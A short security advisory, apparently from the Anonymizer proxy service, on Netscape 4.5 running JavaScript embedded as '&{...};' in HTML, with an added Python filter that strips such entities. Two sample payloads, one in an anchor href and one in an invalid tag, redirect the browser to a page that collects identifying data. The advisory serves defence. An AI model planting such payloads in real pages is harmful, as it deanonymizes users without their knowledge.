Anonymizer Security Issue
We have been alerted to the existence of a Netscape JavaScript security
issue affecting Anonymizer.
Netscape 4.5 (and possibly earlier versions) allows JavaScript code to be embedded inside HTML if the code is delimited with '&{' and '};'. Although this has the potential to be a useful and versatile feature, and was apparently intended as such, it is implemented so broadly that it has the potential for widespread misuse.
We now disable all JavaScript embedded in this way, even if it is not within valid or standard HTML tags.
A simple example is the following:
<A HREF="&{location.href='https://www.anonymizerproxy.com/3.0/snoop.cgi'};">
click here!</A>
In Netscape a page containing this code will briefly load and display "click here!" but will then immediately load the URL between the single quotes. In other browsers, the "click here!" would be displayed followed by a "File Not Found" when the link was selected.
In this case, the page to which the user is redirected retrieves information about the user's domain and other data that could compromise the user's anonymity. A differently designed page could obtain additional information surreptitiously.
A further problem is that this embedded JavaScript will apparently execute even if the HTML tag is not valid. The JavaScript code can be embedded in any string beginning with a "<" followed by any alphabetic character and terminated with a ">". Thus, the following will also execute the above JavaScript:
<x&{location.href='https://www.anonymizerproxy.com/3.0/snoop.cgi'};>
Nothing displays in the location of this tag before redirection occurs.
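One way a rewriting proxy could apply the filtering described above, shown as an added example that is not Anonymizer's own filter code. The function names and sample inputs are constructed for illustration; the rewrite covers the whole document because the entity is honoured even in invalid tag-like strings.

```python
import re

# "<" followed by an alphabetic character: the start of a tag-like string in
# the sense of the advisory, whether or not the tag is valid HTML.
OPENER = re.compile(r"<([A-Za-z][A-Za-z0-9]*)")


def find_js_entities(html):
    """List (enclosing_tag_name_or_None, expression_or_None) per "&{" found."""
    findings = []
    pos = html.find("&{")
    while pos != -1:
        end = html.find("};", pos + 2)
        expr = html[pos + 2:end] if end != -1 else None  # None: no "};" seen
        # Best-effort context for the log: look for an opener between the
        # previous ">" and the entity. A ">" inside an earlier expression can
        # hide the opener, which is why the rewrite below ignores context.
        since_close = html.rfind(">", 0, pos) + 1
        opener = OPENER.search(html, since_close, pos)
        findings.append((opener.group(1) if opener else None, expr))
        pos = html.find("&{", pos + 2)
    return findings


def neutralize_js_entities(html):
    """Drop the "&" from every "&{" so no entity opener survives.

    Runs over the whole document, not just well-formed tags, and fails closed
    on unterminated entities. "&+" matters: a plain replace of "&{" would turn
    "&&{" back into "&{".
    """
    return re.sub(r"&+\{", "{", html)


# Constructed samples modelled on the two forms shown in the advisory.
SAMPLES = [
    "<A HREF=\"&{location.href='https://example.invalid/'};\">click here!</A>",
    "<x&{location.href='https://example.invalid/'};>",
    "<x&&{location.href='https://example.invalid/'};>",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(find_js_entities(sample), "->", neutralize_js_entities(sample))
```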
Thank you.